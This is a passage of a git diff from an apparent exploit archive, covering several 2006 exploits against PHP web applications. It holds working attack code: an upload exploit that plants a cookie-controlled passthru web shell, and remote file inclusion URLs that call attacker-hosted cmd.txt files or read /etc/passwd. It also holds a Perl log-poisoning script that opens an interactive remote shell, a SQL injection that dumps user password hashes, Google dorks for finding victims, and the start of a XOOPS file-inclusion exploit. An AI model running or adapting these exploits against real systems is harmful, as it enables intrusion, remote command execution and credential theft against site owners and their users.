proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +function make_seed() +{ + list($usec, $sec) = explode(' ', microtime()); + return (float) $sec + ((float) $usec * 100000); +} + +function greenwich_timestamp($response) +{ + $temp=explode("Date: ",$response); + $temp2=explode("\r\n",$temp[1]); + $is_now=$temp2[0]; + $temp=explode(" ",$is_now);$day=$temp[1];$month=$temp[2];$year=$temp[3];$temp2=explode(":",$temp[4]); + $hour=$temp2[0];$min=$temp2[1];$sec=$temp2[2]; + $tb=array ('Jan', '1','Feb', '2','Mar', '3','Apr', '4','May', '5','Jun', '6', + 'Jul', '7','Aug', '8','Sep', '9','Oct', '10','Nov', '11','Dec', '12'); + for ($i=0;$i<=23;$i++) {if ($month==$tb[$i]) {$month=$tb[$i+1];break;}} + return mktime($hour,$min,$sec,$month,$day,$year); +} + +function gmtime() { // Get GM offset. + return time() - (int) date('Z'); +} + +$host=$argv[1]; +$path=$argv[2]; +$cmd="";$port=80;$proxy=""; +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +echo "step 0 -> Check if suntzu.php is already installed\r\n"; +$packet ="GET ".$p."files/suntzu.php HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Cookie: cmd=".$cmd.";\r\n"; +$packet.="Connection: Close\r\n\r\n"; +sendpacketii($packet); +if (strstr($html,"56789")) +{ + echo "Exploit succeeded..."; + $temp=explode("56789",$html); + die("\r\n".$temp[1]."\r\n"); +} + +echo "step 0b -> Synchronize...\r\n"; +$difftime=0; +//Unin epoch time by Apache "Date:" response header +//it carries GMT time... sending HEAD request +$packet ="HEAD / HTTP/1.1\r\nHost: ".$host."\r\nConnection: Close\r\n\r\n"; +sendpacketii($packet); +if ((eregi("Date: ",$html)) and ($proxy=='')) +{ +$itstime=greenwich_timestamp($html); +echo "target host Greenwich timestamp: ".$itstime."\r\n"; +$mytime=gmtime(); +echo "my greenwich timestamp: ".$mytime."\r\n"; +$difftime= $itstime-$mytime; +echo "difftime: ".$difftime."\r\n"; +} +else +{ +echo "Unable to read \"Date\", assuming difftime = 0\r\n"; +} + +echo "step 1 -> Register...\r\n"; +srand(make_seed()); +$anumber = rand(1,99999); +$data="name=suntzu".$anumber; +$data.="&pass=suntzu"; +$data.="&pass2=suntzu"; +$data.="&email=suntzu".$anumber."%40fakemail.com"; +$data.="&hideemail=1"; +$data.="&languagex=English"; +$data.="&xthetimeoffset=2"; +$data.="&xthedateformat=d-m-Y"; +$data.="&xthetimeformat=24"; +$data.="&submit=Register"; +$packet ="POST ".$p."misc.php?sub=register HTTP/1.0\r\n"; +$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; +$packet.="User-Agent: Googlebot/2.1\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); +$temp=explode("Set-Cookie: ",$html); +$cookie=""; +for ($i=1; $i<=count($temp)-1; $i++) +{ +$temp2=explode(" ",$temp[$i]); +$cookie.=" ".$temp2[0]; +} +if ($cookie=='') { + die("Unable 
to register..."); + } +else { + echo "cookie -> ".$cookie."\r\n"; + } + +echo "step 2 -> Post a new thread with the evil attachment...\r\n"; + +$attachment=' +<?php +$fp=fopen("suntzu.php","w"); +fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo 56789;passthru(\$_COOKIE[cmd]);echo 56789;?>"); +fclose($fp); +chmod("suntzu.php",777); +?>'; + +$data='-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="subject" + +Sun-Tzu, Art of War +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="posticon" + +None +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="disablesmilies" + +1 +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="fileupload"; filename="suntzu'.$anumber.'.php.php.rar" +Content-Type: application/octet-stream + +'.$attachment.' +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="MAX_FILE_SIZE" + +1048576 +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="what" + +ciao +-----------------------------7d6ee3a7074a +Content-Disposition: form-data; name="submit" + +Post +-----------------------------7d6ee3a7074a-- +'; + +$packet ="POST ".$p."newpost.php?sub=newthread&fid=1 HTTP/1.0\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6ee3a7074a\r\n"; +$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Cookie: ".$cookie."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +$mytime=time() + $difftime; +sendpacketii($packet); +sleep(2); + +/* +file is renamed in this way: + +... +$time = time(); //header.php, line 78 +... + +... +$saveit = $settings['attachdir'] . $filename . '-' . $time . '.' . 
'ext'; //newpost.php, line 218-219 +copy($fileupload['tmp_name'], $saveit); +... */ + +$predict_time= + array ( + $mytime, + $mytime + 1, + $mytime + 2, + $mytime + 3, + $mytime + 4, + $mytime + 5, + $mytime + 6 + ); + +for ($i=0; $i<=count($predict_time)-1; $i++) +{ + $a=3+$i; + echo "step ".$a." -> trying with suntzu".$anumber.".php.php-".$predict_time[$i].".ext\r\n"; + $packet ="GET ".$p."files/suntzu".$anumber.".php.php-".$predict_time[$i].".ext HTTP/1.0\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + sendpacketii($packet); + + $packet ="GET ".$p."files/suntzu.php HTTP/1.0\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Cookie: cmd=".$cmd.";\r\n"; + $packet.="Connection: Close\r\n\r\n"; + sendpacketii($packet); + if (strstr($html,"56789")) + { + echo "Exploit succeeded..."; + $temp=explode("56789",$html); + die("\r\n".$temp[1]."\r\n"); + } +} +//if you are here... +echo "Exploit failed..."; +?> + +# milw0rm.com [2006-05-16] diff --git a/platforms/php/webapps/1798.txt b/platforms/php/webapps/1798.txt index 89066d9bb..9bb67045b 100755 --- a/platforms/php/webapps/1798.txt +++ b/platforms/php/webapps/1798.txt 
@@ -1,11 +1,11 @@
-Quezza BB <= 1.0 (quezza_root_path) File Inclusion Vulnerability.
-Method found by nukedx,
-Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
-This exploit works on Quezza BB <= 1.0
-Original advisory can be found at: http://www.nukedx.com/?viewdoc=30
-http://[victim]/[QuezzaPath]/includes/class_template.php?quezza_root_path=http://yourhost.com/cmd.txt?
-http://[victim]/[QuezzaPath]/includes/class_template.php?quezza_root_path=/etc/passwd%00
-Succesful exploitation register_globals on for both examples.
-# nukedx.com [2006-04-21]
-
-# milw0rm.com [2006-05-17]
+Quezza BB <= 1.0 (quezza_root_path) File Inclusion Vulnerability.
+Method found by nukedx,
+Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
+This exploit works on Quezza BB <= 1.0
+Original advisory can be found at: http://www.nukedx.com/?viewdoc=30
+http://[victim]/[QuezzaPath]/includes/class_template.php?quezza_root_path=http://yourhost.com/cmd.txt?
+http://[victim]/[QuezzaPath]/includes/class_template.php?quezza_root_path=/etc/passwd%00
+Succesful exploitation register_globals on for both examples.
+# nukedx.com [2006-04-21]
+
+# milw0rm.com [2006-05-17]
diff --git a/platforms/php/webapps/1800.txt b/platforms/php/webapps/1800.txt
index 42b84362e..f70a8f2f3 100755
--- a/platforms/php/webapps/1800.txt
+++ b/platforms/php/webapps/1800.txt
@@ -1,32 +1,32 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#ScozNews v1.2.1 - Remote File Include
-#Find by Kacper (Rahim).
-#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
-#Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
-#dork: "(Powered By ScozNews)"
-##################################################################
-
-http://www.site.com/[news_path]/sources/functions.php?CONFIG[main_path]=[evil_scripts]
-
-
-http://www.site.com/[news_path]/sources/template.php?CONFIG[main_path]=[evil_scripts]
-
-
-http://www.site.com/[news_path]/sources/news.php?CONFIG[main_path]=[evil_scripts]
-
-http://www.site.com/[news_path]/sources/help.php?CONFIG[main_path]=[evil_scripts]
-
-http://www.site.com/[news_path]/sources/mail.php?CONFIG[main_path]=[evil_scripts]
-
-http://www.site.com/[news_path]/sources/Admin/admin_cats.php?CONFIG[main_path]=[evil_scripts]
-
-http://www.site.com/[news_path]/sources/Admin/admin_edit.php?CONFIG[main_path]=[evil_scripts]
-
-http://www.site.com/[news_path]/sources/Admin/admin_import.php?CONFIG[main_path]=[evil_scripts]
-
-http://www.site.com/[news_path]/sources/Admin/admin_templates.php?CONFIG[main_path]=[evil_scripts]
-
-###################################################################
-#Elo ;-)
-
-# milw0rm.com [2006-05-17]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#ScozNews v1.2.1 - Remote File Include
+#Find by Kacper (Rahim).
+#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
+#Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
+#dork: "(Powered By ScozNews)"
+##################################################################
+
+http://www.site.com/[news_path]/sources/functions.php?CONFIG[main_path]=[evil_scripts]
+
+
+http://www.site.com/[news_path]/sources/template.php?CONFIG[main_path]=[evil_scripts]
+
+
+http://www.site.com/[news_path]/sources/news.php?CONFIG[main_path]=[evil_scripts]
+
+http://www.site.com/[news_path]/sources/help.php?CONFIG[main_path]=[evil_scripts]
+
+http://www.site.com/[news_path]/sources/mail.php?CONFIG[main_path]=[evil_scripts]
+
+http://www.site.com/[news_path]/sources/Admin/admin_cats.php?CONFIG[main_path]=[evil_scripts]
+
+http://www.site.com/[news_path]/sources/Admin/admin_edit.php?CONFIG[main_path]=[evil_scripts]
+
+http://www.site.com/[news_path]/sources/Admin/admin_import.php?CONFIG[main_path]=[evil_scripts]
+
+http://www.site.com/[news_path]/sources/Admin/admin_templates.php?CONFIG[main_path]=[evil_scripts]
+
+###################################################################
+#Elo ;-)
+
+# milw0rm.com [2006-05-17]
diff --git a/platforms/php/webapps/1804.txt b/platforms/php/webapps/1804.txt
index 05acb9e7e..517200eef 100755
--- a/platforms/php/webapps/1804.txt
+++ b/platforms/php/webapps/1804.txt
@@ -1,9 +1,9 @@
-Title: phpBazar <= 2.1.0 Multiple vulnerabilites
-URL: http://www.smartisoft.com/
-Dork: inurl:classified.php phpbazar
-
-Exploits:
--remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls
--access to admin login and password: /admin/admin.php?action=edit_member&value=1
-
-# milw0rm.com [2006-05-19]
+Title: phpBazar <= 2.1.0 Multiple vulnerabilites
+URL: http://www.smartisoft.com/
+Dork: inurl:classified.php phpbazar
+
+Exploits:
+-remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls
+-access to admin login and password: /admin/admin.php?action=edit_member&value=1
+
+# milw0rm.com [2006-05-19]
diff --git a/platforms/php/webapps/1805.pl b/platforms/php/webapps/1805.pl
index b295e94bc..c8b02c126 100755
--- a/platforms/php/webapps/1805.pl
+++ b/platforms/php/webapps/1805.pl
@@ -1,103 +1,103 @@ -#!/usr/bin/perl -# -# Title: phpListPro <= 2.0.1 Remote Command Execution Exploit -# URL: http://www.smartisoft.com/ -# -# Info: -# - arbitrary local inclusion -# - need magic_quotes_gpc=off -# -# - -use IO::Socket; -use LWP::Simple; - -#ripped from rgod - -@apache=( - "/var/log/httpd/access_log%00", - "/var/log/httpd/error_log%00", - "/var/log/apache/error.log%00", - "/var/log/apache/access.log%00", - "/apache/logs/error.log%00", - "/apache/logs/access.log%00", - "/etc/httpd/logs/acces_log%00", - "/etc/httpd/logs/acces.log%00", - "/etc/httpd/logs/error_log%00", - "/etc/httpd/logs/error.log%00", - "/var/www/logs/access_log%00", - "/var/www/logs/access.log%00", - "/usr/local/apache/logs/access_log%00", - "/usr/local/apache/logs/access.log%00", - "/var/log/apache/access_log%00", - "/var/log/apache/access.log%00", - "/var/log/access_log%00", - "/var/www/logs/error_log%00", - "/www/logs/error.log%00", - "/usr/local/apache/logs/error_log%00", - "/usr/local/apache/logs/error.log%00", - "/var/log/apache/error_log%00", - "/var/log/apache/error.log%00", - "/var/log/access_log%00", - "/var/log/error_log%00", -); - -print "[i] phpListPro remote command execution exploit\n"; -print "[i] Need magic_quotes_gpc=off\n"; -print "[i] Coded by [Oo]\n\n"; - - -if (@ARGV < 3) -{ - print "[*] Usage: phplistpro_exp.pl [host] [path] [apache_path]\n\n"; - print "[*] Apache_Path: \n"; - $i = 0; - while($apache[$i]) - { - print "[$i] $apache[$i]\n"; - $i++; - } - print "\n[*] Exemple: phplistpro_exp.pl 127.0.0.1 /phplistpro/ 1\n"; - exit(); -} - -$serv=$ARGV[0]; -$path=$ARGV[1]; -$type=$ARGV[2]; - -print "[+] Injecting some code in log files...\n"; -#ripped from rgod -$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>"; -$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[-] Connecting ... Could not connect to host.\n\n"; -print $socket "GET ".$path.$CODE." 
HTTP/1.1\r\n"; -print $socket "User-Agent: ".$CODE."\r\n"; -print $socket "Host: ".$serv."\r\n"; -print $socket "Connection: close\r\n\r\n"; -close($socket); - -print "[+] Ok! Now here the shell, type exit to quit\n"; -print "[+] If it's not work maybe try another apache_path...\n\n"; - -print "[shell] "; -$cmd = <STDIN>; - -while($cmd !~ "exit") -{ - $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[-] Connecting ... Could not connect to host.\n\n"; - - print $socket "GET ".$path."config.php HTTP/1.1\r\n"; - print $socket "Host: ".$serv."\r\n"; - print $socket "Accept: */*\r\n"; - print $socket "Cookie: Language=/../../../../../../../../../..".$apache[$type].";cmd=$cmd \r\n"; - print $socket "Connection: close\r\n\n"; - - while ($answer = <$socket>) - { - print $answer; - } - - print "[shell] "; - $cmd = <STDIN>; -} - -# milw0rm.com [2006-05-19] +#!/usr/bin/perl +# +# Title: phpListPro <= 2.0.1 Remote Command Execution Exploit +# URL: http://www.smartisoft.com/ +# +# Info: +# - arbitrary local inclusion +# - need magic_quotes_gpc=off +# +# + +use IO::Socket; +use LWP::Simple; + +#ripped from rgod + +@apache=( + "/var/log/httpd/access_log%00", + "/var/log/httpd/error_log%00", + "/var/log/apache/error.log%00", + "/var/log/apache/access.log%00", + "/apache/logs/error.log%00", + "/apache/logs/access.log%00", + "/etc/httpd/logs/acces_log%00", + "/etc/httpd/logs/acces.log%00", + "/etc/httpd/logs/error_log%00", + "/etc/httpd/logs/error.log%00", + "/var/www/logs/access_log%00", + "/var/www/logs/access.log%00", + "/usr/local/apache/logs/access_log%00", + "/usr/local/apache/logs/access.log%00", + "/var/log/apache/access_log%00", + "/var/log/apache/access.log%00", + "/var/log/access_log%00", + "/var/www/logs/error_log%00", + "/www/logs/error.log%00", + "/usr/local/apache/logs/error_log%00", + "/usr/local/apache/logs/error.log%00", + "/var/log/apache/error_log%00", + "/var/log/apache/error.log%00", + "/var/log/access_log%00", + 
"/var/log/error_log%00", +); + +print "[i] phpListPro remote command execution exploit\n"; +print "[i] Need magic_quotes_gpc=off\n"; +print "[i] Coded by [Oo]\n\n"; + + +if (@ARGV < 3) +{ + print "[*] Usage: phplistpro_exp.pl [host] [path] [apache_path]\n\n"; + print "[*] Apache_Path: \n"; + $i = 0; + while($apache[$i]) + { + print "[$i] $apache[$i]\n"; + $i++; + } + print "\n[*] Exemple: phplistpro_exp.pl 127.0.0.1 /phplistpro/ 1\n"; + exit(); +} + +$serv=$ARGV[0]; +$path=$ARGV[1]; +$type=$ARGV[2]; + +print "[+] Injecting some code in log files...\n"; +#ripped from rgod +$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>"; +$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[-] Connecting ... Could not connect to host.\n\n"; +print $socket "GET ".$path.$CODE." HTTP/1.1\r\n"; +print $socket "User-Agent: ".$CODE."\r\n"; +print $socket "Host: ".$serv."\r\n"; +print $socket "Connection: close\r\n\r\n"; +close($socket); + +print "[+] Ok! Now here the shell, type exit to quit\n"; +print "[+] If it's not work maybe try another apache_path...\n\n"; + +print "[shell] "; +$cmd = <STDIN>; + +while($cmd !~ "exit") +{ + $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[-] Connecting ... Could not connect to host.\n\n"; + + print $socket "GET ".$path."config.php HTTP/1.1\r\n"; + print $socket "Host: ".$serv."\r\n"; + print $socket "Accept: */*\r\n"; + print $socket "Cookie: Language=/../../../../../../../../../..".$apache[$type].";cmd=$cmd \r\n"; + print $socket "Connection: close\r\n\n"; + + while ($answer = <$socket>) + { + print $answer; + } + + print "[shell] "; + $cmd = <STDIN>; +} + +# milw0rm.com [2006-05-19] diff --git a/platforms/php/webapps/1808.txt b/platforms/php/webapps/1808.txt index a40d3cdd5..8cc650a5a 100755 --- a/platforms/php/webapps/1808.txt +++ b/platforms/php/webapps/1808.txt 
@@ -1,15 +1,15 @@
-Title : phpMyDirectory <= 10.4.4 Remote File Inclusion Vulnerability
--
-URL : http://www.phpmydirectory.com/
--
-Dork : "powered by phpmydirectory" or intext:"2001-2006 phpMyDirectory.com"
--
-Author : OLiBekaS
--
-contact : olibekas[at]gmail.com
--
-greetz : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
--
-Exploit : http://[target]/[path]/cron.php?ROOT_PATH=http://[attacker]/cmd.txt?&cmd=ls
-
-# milw0rm.com [2006-05-19]
+Title : phpMyDirectory <= 10.4.4 Remote File Inclusion Vulnerability
+-
+URL : http://www.phpmydirectory.com/
+-
+Dork : "powered by phpmydirectory" or intext:"2001-2006 phpMyDirectory.com"
+-
+Author : OLiBekaS
+-
+contact : olibekas[at]gmail.com
+-
+greetz : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
+-
+Exploit : http://[target]/[path]/cron.php?ROOT_PATH=http://[attacker]/cmd.txt?&cmd=ls
+
+# milw0rm.com [2006-05-19]
diff --git a/platforms/php/webapps/1809.txt b/platforms/php/webapps/1809.txt
index a4159625e..857ad8ae6 100755
--- a/platforms/php/webapps/1809.txt
+++ b/platforms/php/webapps/1809.txt
@@ -1,31 +1,31 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#CaLogic Calendars V1.2.2 - Remote File Include
-#Find by Kacper (Rahim).
-#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
-#Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
-#dork: CaLogic Calendars V1.2.2
-##################################################################
-reconfig.php:
-[code]
-include_once("./include/config.php");
-include_once($GLOBALS["CLPath"]."/classes/session.php");
-include_once($GLOBALS["CLPath"]."/include/gfunc.php");
-include_once($GLOBALS["CLPath"]."/classes/calogicautomation.php");
-[/code]
-
-http://site.com/[path]/reconfig.php?GLOBALS[CLPath]=[evil_script]
-
-
-srxclr.php:
-[code]
-include_once("./include/config.php");
-include_once($GLOBALS["CLPath"]."/include/calfunc.php");
-include_once($GLOBALS["CLPath"]."/include/gfunc.php");
-include_once($GLOBALS["CLPath"]."/include/efuncs.php");
-[/code]
-
-http://site.com/[path]/srxclr.php?GLOBALS[CLPath]=[evil_script]
-
-#pozdro :)
-
-# milw0rm.com [2006-05-20]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#CaLogic Calendars V1.2.2 - Remote File Include
+#Find by Kacper (Rahim).
+#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
+#Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
+#dork: CaLogic Calendars V1.2.2
+##################################################################
+reconfig.php:
+[code]
+include_once("./include/config.php");
+include_once($GLOBALS["CLPath"]."/classes/session.php");
+include_once($GLOBALS["CLPath"]."/include/gfunc.php");
+include_once($GLOBALS["CLPath"]."/classes/calogicautomation.php");
+[/code]
+
+http://site.com/[path]/reconfig.php?GLOBALS[CLPath]=[evil_script]
+
+
+srxclr.php:
+[code]
+include_once("./include/config.php");
+include_once($GLOBALS["CLPath"]."/include/calfunc.php");
+include_once($GLOBALS["CLPath"]."/include/gfunc.php");
+include_once($GLOBALS["CLPath"]."/include/efuncs.php");
+[/code]
+
+http://site.com/[path]/srxclr.php?GLOBALS[CLPath]=[evil_script]
+
+#pozdro :)
+
+# milw0rm.com [2006-05-20]
diff --git a/platforms/php/webapps/1810.pl b/platforms/php/webapps/1810.pl
index f1b949702..0fc93763a 100755
--- a/platforms/php/webapps/1810.pl
+++ b/platforms/php/webapps/1810.pl
@@ -1,75 +1,75 @@ -#!/usr/bin/perl - -use IO::Socket; - -print q{ -################################################################################ -## ## -## Woltlab Burning Board 2.3.4 <= "links.php" SQL Injection Exploit ## -## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## -## Exploit by | 666 (SR-Crew) ## -## Bug by | x82 ## -## Googledork | inurl:/wbb2/links.php?cat ## -## Usage | links.pl [server] [path] ## -## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## -## ## -################################################################################ - -}; - -$webpage = $ARGV[0]; -$directory = $ARGV[1]; - -if (!$webpage||!$directory) { die "[+] Exploit failed\n"; } - -$wbb_dir = -"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users"; - -$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", -PeerPort=>"80") || die "[+] Can't connect to Server\n"; -print "[+] Exploiting....\n"; -print $sock "GET $wbb_dir HTTP/1.1\n"; -print $sock "Accept: */*\n"; -print $sock "User-Agent: Hacker\n"; -print $sock "Host: $webpage\n"; -print $sock "Connection: close\n\n"; - -while ($answer = <$sock>) { - if ($answer =~ -/(................................)<\/span><\/b><\/font>/) { - print "[+] Hash: $1\n"; - exit(); - } - if ($answer =~ /SQL-DATABASE ERROR/) { - break; - } -} - -$wbb_dir = -"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users"; -close($sock); - -$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", -PeerPort=>"80") || die "[+] Can't connect to Server\n"; -print $sock "GET $wbb_dir HTTP/1.1\n"; -print $sock "Accept: */*\n"; -print $sock "User-Agent: Hacker\n"; -print $sock "Host: $webpage\n"; -print $sock "Connection: close\n\n"; - -while ($answer = <$sock>) { - if ($answer =~ -/(................................)<\/span><\/b><\/font>/) { - print "[+] Hash: $1\n"; - exit(); - } - if ($answer =~ /SQL-DATABASE ERROR/) { 
- print "[+] Try replacing bb1_users with bb2_users\n"; - break; - } -} -close($sock); - -print "[+] Exploit failed\n"; - -# milw0rm.com [2006-05-20] +#!/usr/bin/perl + +use IO::Socket; + +print q{ +################################################################################ +## ## +## Woltlab Burning Board 2.3.4 <= "links.php" SQL Injection Exploit ## +## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## +## Exploit by | 666 (SR-Crew) ## +## Bug by | x82 ## +## Googledork | inurl:/wbb2/links.php?cat ## +## Usage | links.pl [server] [path] ## +## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## +## ## +################################################################################ + +}; + +$webpage = $ARGV[0]; +$directory = $ARGV[1]; + +if (!$webpage||!$directory) { die "[+] Exploit failed\n"; } + +$wbb_dir = +"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users"; + +$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", +PeerPort=>"80") || die "[+] Can't connect to Server\n"; +print "[+] Exploiting....\n"; +print $sock "GET $wbb_dir HTTP/1.1\n"; +print $sock "Accept: */*\n"; +print $sock "User-Agent: Hacker\n"; +print $sock "Host: $webpage\n"; +print $sock "Connection: close\n\n"; + +while ($answer = <$sock>) { + if ($answer =~ +/(................................)<\/span><\/b><\/font>/) { + print "[+] Hash: $1\n"; + exit(); + } + if ($answer =~ /SQL-DATABASE ERROR/) { + break; + } +} + +$wbb_dir = +"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users"; +close($sock); + +$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", +PeerPort=>"80") || die "[+] Can't connect to Server\n"; +print $sock "GET $wbb_dir HTTP/1.1\n"; +print $sock "Accept: */*\n"; +print $sock "User-Agent: Hacker\n"; +print $sock "Host: $webpage\n"; +print $sock "Connection: close\n\n"; + +while ($answer = <$sock>) { + if ($answer =~ 
+/(................................)<\/span><\/b><\/font>/) { + print "[+] Hash: $1\n"; + exit(); + } + if ($answer =~ /SQL-DATABASE ERROR/) { + print "[+] Try replacing bb1_users with bb2_users\n"; + break; + } +} +close($sock); + +print "[+] Exploit failed\n"; + +# milw0rm.com [2006-05-20] diff --git a/platforms/php/webapps/1811.php b/platforms/php/webapps/1811.php index 08cdc4740..06892a453 100755 --- a/platforms/php/webapps/1811.php +++ b/platforms/php/webapps/1811.php 
@@ -1,224 +1,224 @@ -#!/usr/bin/php -q -d short_open_tag=on -<? -echo "XOOPS <= 2.0.13.2 'xoopsOption[nocommon]' exploit\r\n"; -echo "by rgod rgod@autistici.org\r\n"; -echo "site: http://retrogod.altervista.org\r\n\r\n"; - -/* - works with: - magic_quotes_gpc = Off - register_globals = On -*/ - -if ($argc<4) { -echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to xoops\r\n"; -echo "cmd: a shell command\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /xoops/ \r\n"; -echo "php ".$argv[0]." localhost /xoops/ ls -la -p81\r\n"; -echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n"; -die; -} - -/* hi, back from my annual social engineering tour, this year in Milan ;) - welcome to this new 0day experience... - explaination: - - vulnerable code in mainfile.php at lines 94-96: - ... - if (!isset($xoopsOption['nocommon']) && XOOPS_ROOT_PATH != '') { - include XOOPS_ROOT_PATH."/include/common.php"; - } - ... 
- - if register_globals = On you can overwrite $xoopsOption['nocommon'] var, to - skip common.php inclusion where $xoopsConfig['language'] and - $xoopsConfig['theme_set] are initialized, so, if magic_quotes_gpc=Off - you can include arbitrary files from local resources, ex., Apache log files: - - http://[target]/[path]/misc.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoopsConfig[language]=../../../../../../../../../../var/log/httpd/access_log%00 - http://[target]/[path]/index.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoopsConfig[theme_set]=../../../../../../../../../../var/log/httpd/error_log%00 - - or, if avatar uploads are enabled: - - http://[target]/xoops/html/index.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoopsConfig[theme_set]=../uploads/cavt44703c30d3dbf.jpg%00 - - this tool inject some php code in apache log files and try to launch commands - */ - -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
